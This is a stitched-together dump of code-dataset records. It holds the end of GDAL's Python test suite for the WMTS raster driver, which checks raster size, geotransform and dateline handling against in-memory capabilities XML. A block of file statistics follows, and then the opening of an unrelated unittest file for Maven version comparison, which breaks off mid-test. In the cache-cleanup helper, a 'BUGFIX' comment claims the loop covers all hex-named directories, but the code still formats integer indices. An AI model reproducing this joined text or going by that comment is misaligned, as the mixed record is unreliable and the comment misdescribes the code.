<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_17.xml"/>
</Capabilities>""")
    ds = gdal.Open('WMTS:/vsimem/wmts_17.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 512:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    if ds.RasterYSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterYSize)
        return 'fail'
    got_gt = ds.GetGeoTransform()
    expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
    for i in range(6):
        if abs(got_gt[i] - expected_gt[i]) > 1e-8:
            gdaltest.post_reason('fail')
            print(got_gt)
            return 'fail'
    # SRS must be EPSG:4326 with axis-order information stripped.
    if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
        gdaltest.post_reason('fail')
        print(ds.GetProjectionRef())
        return 'fail'
    return 'success'
###############################################################################
# AOI from TileMatrixSet BoundingBox
def wmts_18():
    """Test that the dataset's area of interest falls back to the
    TileMatrixSet's ows:BoundingBox when the layer itself has none."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/wmts_18.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG::4326">
<ows:LowerCorner>0 -90</ows:LowerCorner>
<ows:UpperCorner>90 90</ows:UpperCorner>
</ows:BoundingBox>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_18.xml"/>
</Capabilities>""")
    ds = gdal.Open('WMTS:/vsimem/wmts_18.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 512:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    if ds.RasterYSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterYSize)
        return 'fail'
    got_gt = ds.GetGeoTransform()
    expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
    for i in range(6):
        if abs(got_gt[i] - expected_gt[i]) > 1e-8:
            gdaltest.post_reason('fail')
            print(got_gt)
            return 'fail'
    # SRS must be EPSG:4326 with axis-order information stripped.
    if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
        gdaltest.post_reason('fail')
        print(ds.GetProjectionRef())
        return 'fail'
    return 'success'
###############################################################################
# AOI from TileMatrixSetLimits
def wmts_19():
    """Test that the dataset's area of interest is derived from the layer's
    TileMatrixSetLimits when no bounding box is advertised."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/wmts_19.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
<TileMatrixSetLimits>
<TileMatrixLimits>
<TileMatrix>GoogleCRS84Quad:2</TileMatrix>
<MinTileRow>0</MinTileRow>
<MaxTileRow>0</MaxTileRow>
<MinTileCol>1</MinTileCol>
<MaxTileCol>2</MaxTileCol>
</TileMatrixLimits>
</TileMatrixSetLimits>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_19.xml"/>
</Capabilities>""")
    ds = gdal.Open('WMTS:/vsimem/wmts_19.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    # Limits select tile columns 1-2 of row 0 at level 2: 2x1 tiles of 256 px.
    if ds.RasterXSize != 512:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    if ds.RasterYSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterYSize)
        return 'fail'
    got_gt = ds.GetGeoTransform()
    expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
    for i in range(6):
        if abs(got_gt[i] - expected_gt[i]) > 1e-8:
            gdaltest.post_reason('fail')
            print(got_gt)
            return 'fail'
    # SRS must be EPSG:4326 with axis-order information stripped.
    if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
        gdaltest.post_reason('fail')
        print(ds.GetProjectionRef())
        return 'fail'
    return 'success'
###############################################################################
# AOI from layer BoundingBox but restricted with TileMatrixSetLimits
def wmts_20():
    """Test that a layer ows:BoundingBox covering the whole tile matrix is
    restricted by the narrower TileMatrixSetLimits."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/wmts_20.xml', """<Capabilities>
<Contents>
<Layer>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG::4326">
<ows:LowerCorner>-90 -180</ows:LowerCorner>
<ows:UpperCorner>90 180</ows:UpperCorner>
</ows:BoundingBox>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
<TileMatrixSetLimits>
<TileMatrixLimits>
<TileMatrix>GoogleCRS84Quad:2</TileMatrix>
<MinTileRow>0</MinTileRow>
<MaxTileRow>0</MaxTileRow>
<MinTileCol>1</MinTileCol>
<MaxTileCol>2</MaxTileCol>
</TileMatrixLimits>
</TileMatrixSetLimits>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_20.xml"/>
</Capabilities>""")
    ds = gdal.Open('WMTS:/vsimem/wmts_20.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    # The limits win over the world-wide bbox: 2x1 tiles of 256 px.
    if ds.RasterXSize != 512:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    if ds.RasterYSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterYSize)
        return 'fail'
    got_gt = ds.GetGeoTransform()
    expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
    for i in range(6):
        if abs(got_gt[i] - expected_gt[i]) > 1e-8:
            gdaltest.post_reason('fail')
            print(got_gt)
            return 'fail'
    # SRS must be EPSG:4326 with axis-order information stripped.
    if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
        gdaltest.post_reason('fail')
        print(ds.GetProjectionRef())
        return 'fail'
    return 'success'
###############################################################################
# Test ExtendBeyondDateLine
def wmts_21():
    """Test the extendbeyonddateline open option: the dataset origin is
    shifted past longitude 180 and tiles are fetched on both sides of the
    antimeridian."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/wmts_21.xml', """<Capabilities>
<Contents>
<Layer>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG::4326">
<ows:LowerCorner>-90 -180</ows:LowerCorner>
<ows:UpperCorner>0 180</ows:UpperCorner>
</ows:BoundingBox>
<!-- completely made-up case and not really representative... -->
<ows:BoundingBox crs="urn:ogc:def:crs:OGC:2:84">
<ows:LowerCorner>90 -90</ows:LowerCorner>
<ows:UpperCorner>-90 0</ows:UpperCorner>
</ows:BoundingBox>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<ResourceURL format="image/png"
template="/vsimem/wmts_21/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_21.xml"/>
</Capabilities>""")
    ds = gdal.Open('WMTS:/vsimem/wmts_21.xml,extendbeyonddateline=yes')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 512:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    if ds.RasterYSize != 256:
        gdaltest.post_reason('fail')
        print(ds.RasterYSize)
        return 'fail'
    got_gt = ds.GetGeoTransform()
    # Origin at longitude 90: extends across the dateline to 90+180.
    expected_gt = (90, 0.3515625, 0.0, 0.0, 0.0, -0.3515625)
    for i in range(6):
        if abs(got_gt[i] - expected_gt[i]) > 1e-8:
            gdaltest.post_reason('fail')
            print(got_gt)
            return 'fail'
    if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
        gdaltest.post_reason('fail')
        print(ds.GetProjectionRef())
        return 'fail'
    # Tile east of the dateline (col 3, fill value 64).
    tmp_ds = gdal.GetDriverByName('MEM').Create('',256,256,4)
    for i in range(4):
        tmp_ds.GetRasterBand(i+1).Fill(64)
    tmp3_ds = gdal.GetDriverByName('PNG').CreateCopy('/vsimem/wmts_21/default_style/tms/GoogleCRS84Quad:2/1/3.png', tmp_ds)
    # Tile west of the dateline wrap-around (col 0, fill value 128).
    tmp_ds = gdal.GetDriverByName('MEM').Create('',256,256,4)
    for i in range(4):
        tmp_ds.GetRasterBand(i+1).Fill(128)
    tmp0_ds = gdal.GetDriverByName('PNG').CreateCopy('/vsimem/wmts_21/default_style/tms/GoogleCRS84Quad:2/1/0.png', tmp_ds)
    if ds.GetRasterBand(1).ReadRaster(0,0,256,256) != tmp3_ds.GetRasterBand(1).ReadRaster(0,0,256,256):
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.GetRasterBand(1).ReadRaster(256,0,256,256) != tmp0_ds.GetRasterBand(1).ReadRaster(0,0,256,256):
        gdaltest.post_reason('fail')
        return 'fail'
    return 'success'
###############################################################################
# Test when WGS84BoundingBox is a densified reprojection of the tile matrix bbox
def wmts_22():
    """Test the case where WGS84BoundingBox is a densified reprojection of
    the tile matrix bbox: the full tile matrix extent must be used."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.FileFromMemBuffer('/vsimem/wmts_22.xml', """<Capabilities>
<Contents>
<Layer>
<ows:WGS84BoundingBox>
<ows:LowerCorner>-6.38153862706 55.6179644952</ows:LowerCorner>
<ows:UpperCorner>60.3815386271 75.5825702342</ows:UpperCorner>
</ows:WGS84BoundingBox>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>tms</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::3067</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>13</ows:Identifier>
<ScaleDenominator>3571.42857143</ScaleDenominator>
<TopLeftCorner>-548576.0 8388608.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>8192</MatrixWidth>
<MatrixHeight>8192</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_22.xml"/>
</Capabilities>""")
    ds = gdal.Open('WMTS:/vsimem/wmts_22.xml')
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    # Full 8192 x 8192 tile matrix of 256 px tiles.
    if ds.RasterXSize != 2097152:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    if ds.RasterYSize != 2097152:
        gdaltest.post_reason('fail')
        print(ds.RasterYSize)
        return 'fail'
    got_gt = ds.GetGeoTransform()
    expected_gt = (-548576.0, 1.0000000000004, 0.0, 8388608.0, 0.0, -1.0000000000004)
    for i in range(6):
        if abs(got_gt[i] - expected_gt[i]) > 1e-8:
            gdaltest.post_reason('fail')
            print(got_gt)
            return 'fail'
    if ds.GetProjectionRef().find('3067') < 0:
        gdaltest.post_reason('fail')
        print(ds.GetProjectionRef())
        return 'fail'
    return 'success'
###############################################################################
#
def wmts_23( imagetype, expected_cs ):
    """Open a single-tile WMTS dataset whose tile is built from
    data/wms/<imagetype>.png and check each band checksum against
    expected_cs (list of 4 values)."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    inputXml = '/vsimem/' + imagetype +'.xml'
    serviceUrl = '/vsimem/wmts_23/' + imagetype
    gdal.FileFromMemBuffer( inputXml, """<Capabilities>
<Contents>
<Layer>
<Identifier/>
<TileMatrixSetLink>
<TileMatrixSet/>
</TileMatrixSetLink>
<Style>
<Identifier/>
</Style>
<ResourceURL format="image/png" template=" """ + serviceUrl + """/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier/>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>128</TileWidth>
<TileHeight>128</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>""")
    tmp_ds = gdal.Open( 'data/wms/' + imagetype + '.png' )
    if tmp_ds is None:
        gdaltest.post_reason('fail - cannot open tmp_ds')
        return 'fail'
    # Serve the source image as the single tile (0/0/0) of the layer.
    tile0_ds = gdal.GetDriverByName('PNG').CreateCopy(serviceUrl + '/0/0/0.png', tmp_ds )
    if tile0_ds is None:
        gdaltest.post_reason('fail - cannot create tile0')
        return 'fail'
    ds = gdal.Open('WMTS:' + inputXml )
    if ds is None:
        gdaltest.post_reason('fail')
        return 'fail'
    if ds.RasterXSize != 128:
        gdaltest.post_reason('fail')
        print(ds.RasterXSize)
        return 'fail'
    if ds.RasterYSize != 128:
        gdaltest.post_reason('fail')
        print(ds.RasterYSize)
        return 'fail'
    for i in range(4):
        cs = ds.GetRasterBand( i + 1 ).Checksum()
        if cs != expected_cs[i]:
            gdaltest.post_reason('fail')
            print( cs )
            return 'fail'
    return 'success'
def wmts_23_gray():
    """Run the wmts_23 scenario against a grayscale source image."""
    return wmts_23('gray', [60137, 60137, 60137, 4428])
def wmts_23_grayalpha():
    """Run the wmts_23 scenario against a gray+alpha source image."""
    return wmts_23('gray+alpha', [39910, 39910, 39910, 63180])
def wmts_23_pal():
    """Run the wmts_23 scenario against a paletted source image."""
    return wmts_23('pal', [62950, 59100, 63864, 453])
def wmts_23_rgb():
    """Run the wmts_23 scenario against an RGB source image."""
    return wmts_23('rgb', [1020, 3665, 6180, 4428])
def wmts_23_rgba():
    """Run the wmts_23 scenario against an RGBA source image."""
    return wmts_23('rgba', [65530, 51449, 1361, 59291])
###############################################################################
#
def wmts_CleanCache():
    """Remove every cached tile under the /vsimem/cache/<i>/<j> directories.

    The cache is spread over a 16 x 16 grid of subdirectories; visit each
    one and unlink all the files it contains.
    """
    # BUGFIX: the string previously read '012346789abcdef' (missing '5'),
    # so len(hexstr) was 15 and the loops only visited a 15 x 15 subset of
    # the 16 x 16 cache directories, leaving some tiles behind.
    hexstr = '0123456789abcdef'
    for i in range(len(hexstr)):
        for j in range(len(hexstr)):
            lst = gdal.ReadDir('/vsimem/cache/%s/%s' % (i, j))
            if lst is not None:
                for f in lst:
                    gdal.Unlink('/vsimem/cache/%s/%s/%s' % (i, j, f))
###############################################################################
#
def wmts_cleanup():
    """Final cleanup: reset config options and delete in-memory and on-disk
    cache files created by the WMTS tests."""
    if gdaltest.wmts_drv is None:
        return 'skip'
    gdal.SetConfigOption('CPL_CURL_ENABLE_VSIMEM', None)
    gdal.SetConfigOption('GDAL_DEFAULT_WMS_CACHE_PATH', None)
    wmts_CleanCache()
    lst = gdal.ReadDir('/vsimem/')
    if lst:
        for f in lst:
            gdal.Unlink('/vsimem/' + f)
    # Best-effort removal of the on-disk cache; ignore if it does not exist.
    try:
        shutil.rmtree('tmp/wmts_cache')
    except:
        pass
    return 'success'
# Ordered list of test callables executed by the gdaltest framework.
gdaltest_list = [
    wmts_1,
    wmts_2,
    wmts_3,
    wmts_4,
    wmts_5,
    wmts_6,
    wmts_7,
    wmts_8,
    wmts_9,
    wmts_10,
    wmts_11,
    wmts_12,
    wmts_12bis,
    wmts_13,
    wmts_14,
    wmts_15,
    wmts_16,
    wmts_17,
    wmts_18,
    wmts_19,
    wmts_20,
    wmts_21,
    wmts_22,
    wmts_23_gray,
    wmts_23_grayalpha,
    wmts_23_pal,
    wmts_23_rgb,
    wmts_23_rgba,
    wmts_cleanup ]

if __name__ == '__main__':
    gdaltest.setup_run( 'wmts' )
    gdaltest.run_tests( gdaltest_list )
    gdaltest.summarize()
| 35.469184
| 244
| 0.569333
| 6,223
| 63,880
| 5.76619
| 0.075044
| 0.036452
| 0.054678
| 0.066828
| 0.865201
| 0.845024
| 0.835187
| 0.811582
| 0.783658
| 0.758576
| 0
| 0.060824
| 0.26855
| 63,880
| 1,800
| 245
| 35.488889
| 0.707138
| 0.032044
| 0
| 0.810972
| 0
| 0.020489
| 0.619486
| 0.304448
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020489
| false
| 0.000661
| 0.002644
| 0.003305
| 0.131527
| 0.033708
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ace6881b8d6091641ff24c5aaeb39c71fc32036
| 10,752
|
py
|
Python
|
test/mavenversioncmptest.py
|
pausan/python-maven
|
97b8735170de2f67dcb557afdfdb271cce335d42
|
[
"MIT"
] | null | null | null |
test/mavenversioncmptest.py
|
pausan/python-maven
|
97b8735170de2f67dcb557afdfdb271cce335d42
|
[
"MIT"
] | null | null | null |
test/mavenversioncmptest.py
|
pausan/python-maven
|
97b8735170de2f67dcb557afdfdb271cce335d42
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os,sys
import unittest
sys.path.append (os.path.join (os.path.dirname (__file__), '..'))
from mavencoord import MavenCoord
import mavenversioncmp as vercmp
class MavenVersionCompareTest (unittest.TestCase):
    """Unit tests for the mavenversioncmp helpers.

    Covers getCanonical() (splitting a version string into major, minor,
    revision, qualifier and build) and satisfies()/compare() against the
    Maven version-range syntax ([a,b], (a,b), open-ended and multi-range).

    NOTE: the deprecated ``assertEquals`` alias (removed in Python 3.12)
    has been replaced by ``assertEqual`` throughout; the redundant bare
    ``return`` statements at the end of each test were dropped.
    """

    def testGetCanonical (self):
        """getCanonical() splits a version into (major, minor, rev, qualifier, build)."""
        # Empty string canonicalizes to all zeros / empty qualifier.
        (major, minor, rev, qualifier, build) = vercmp.getCanonical ('')
        self.assertEqual (major, 0)
        self.assertEqual (minor, 0)
        self.assertEqual (rev, 0)
        self.assertEqual (qualifier, '')
        self.assertEqual (build, 0)

        (major, minor, rev, qualifier, build) = vercmp.getCanonical ('1.2')
        self.assertEqual (major, 1)
        self.assertEqual (minor, 2)
        self.assertEqual (rev, 0)
        self.assertEqual (qualifier, '')
        self.assertEqual (build, 0)

        (major, minor, rev, qualifier, build) = vercmp.getCanonical ('121.2.78')
        self.assertEqual (major, 121)
        self.assertEqual (minor, 2)
        self.assertEqual (rev, 78)
        self.assertEqual (qualifier, '')
        self.assertEqual (build, 0)

        # Qualifier is lowercased.
        (major, minor, rev, qualifier, build) = vercmp.getCanonical ('121.2.78-SNAPSHOT')
        self.assertEqual (major, 121)
        self.assertEqual (minor, 2)
        self.assertEqual (rev, 78)
        self.assertEqual (qualifier, 'snapshot')
        self.assertEqual (build, 0)

        # Trailing numeric part after the qualifier is the build number.
        (major, minor, rev, qualifier, build) = vercmp.getCanonical ('44.33.22-ReLeASe-9901')
        self.assertEqual (major, 44)
        self.assertEqual (minor, 33)
        self.assertEqual (rev, 22)
        self.assertEqual (qualifier, 'release')
        self.assertEqual (build, 9901)

    def testCompare (self):
        """compare() orders two plain version strings."""
        self.assertEqual (vercmp.compare ('', ''), 0)
        self.assertEqual (vercmp.compare ('', '0.0'), 0)
        self.assertEqual (vercmp.compare ('', '0.0.0--0'), 0)
        self.assertTrue (vercmp.compare ('', '1') < 0)
        self.assertTrue (vercmp.compare ('1', '0') > 0)
        self.assertTrue (vercmp.compare ('1.3.2', '2.1.1') < 0)
        self.assertTrue (vercmp.compare ('1.3.2', '1.4.0') < 0)
        self.assertTrue (vercmp.compare ('1.3.2', '1.3.3') < 0)
        self.assertTrue (vercmp.compare ('2.1.1', '1.3.2') > 0)
        self.assertTrue (vercmp.compare ('1.4.0', '1.3.2') > 0)
        self.assertTrue (vercmp.compare ('1.3.3', '1.3.2') > 0)
        self.assertTrue (vercmp.compare ('1.3', '1.2]') > 0)

    def testSatisfiesMinimum (self):
        """A bare version or '[x,]' / '(x,)' range acts as a minimum bound."""
        self.assertFalse (vercmp.satisfies ("1.2", "1.3"))
        self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "12.1.2-a-1"))
        self.assertTrue (vercmp.satisfies ("1.3", "1.2"))
        self.assertTrue (vercmp.satisfies ("12.1.2-2-0", "12.1.2-2-0"))
        self.assertTrue (vercmp.satisfies ("1.2.3-RELEASE", "1.2.3-RELEASE"))
        self.assertFalse (vercmp.satisfies ("1.2", "[1.3,]"))
        self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "[12.1.2-a-1,]"))
        self.assertFalse (vercmp.satisfies ("1.3", "[1.4,]"))
        self.assertTrue (vercmp.satisfies ("1.3", "[1.2,]"))
        self.assertTrue (vercmp.satisfies ("12.1.2-2-0", "[12.1.2-2-0,]"))
        self.assertTrue (vercmp.satisfies ("1.2.3-RELEASE", "[1.2.3-RELEASE,]"))
        self.assertFalse (vercmp.satisfies ("1.2", "(1.3,)"))
        self.assertFalse (vercmp.satisfies ("12.1.2-a-0", "(12.1.2-a-1,)"))
        self.assertFalse (vercmp.satisfies ("1.3", "(1.4,)"))
        self.assertTrue (vercmp.satisfies ("1.3", "(1.2,)"))
        self.assertFalse (vercmp.satisfies ("12.1.2-2-0", "(12.1.2-2-0,)"))
        self.assertFalse (vercmp.satisfies ("1.2.3-RELEASE", "(1.2.3-RELEASE,)"))

    def testSatisfiesMaximum (self):
        """'[,x]' / '(,x)' ranges act as a maximum bound."""
        self.assertTrue (vercmp.satisfies ("1.2", "[,1.3]"))
        self.assertTrue (vercmp.satisfies ("12.1.2-a-0", "[,12.1.2-a-1]"))
        self.assertFalse (vercmp.satisfies ("1.3", "[,1.2]"))
        self.assertTrue (vercmp.satisfies ("1.3", "[,1.4]"))
